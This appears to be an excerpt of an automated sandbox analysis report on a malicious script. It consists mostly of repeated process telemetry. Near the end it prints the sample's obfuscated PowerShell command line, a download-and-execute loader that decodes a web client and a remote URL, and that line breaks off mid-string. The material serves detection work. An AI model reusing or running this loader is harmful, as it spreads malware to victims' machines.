              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAACC76855 push 30D00000h; retf 4_2_00007FFAACC7685A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_073B279D push esp; ret 13_2_073B27A5
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6541Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3292Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7586Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2207Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4856Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000004.00000002.1461760527.000001677BED3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWkk%SystemRoot%\system32\mswsock.dllsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane
              Source: wscript.exe, 00000000.00000003.1259503516.000001E15F31F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\l
              Source: PING.EXE, 00000002.00000002.1256963431.00000240627B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7400.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8108, type: MEMORYSTR
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j Jump to behavior
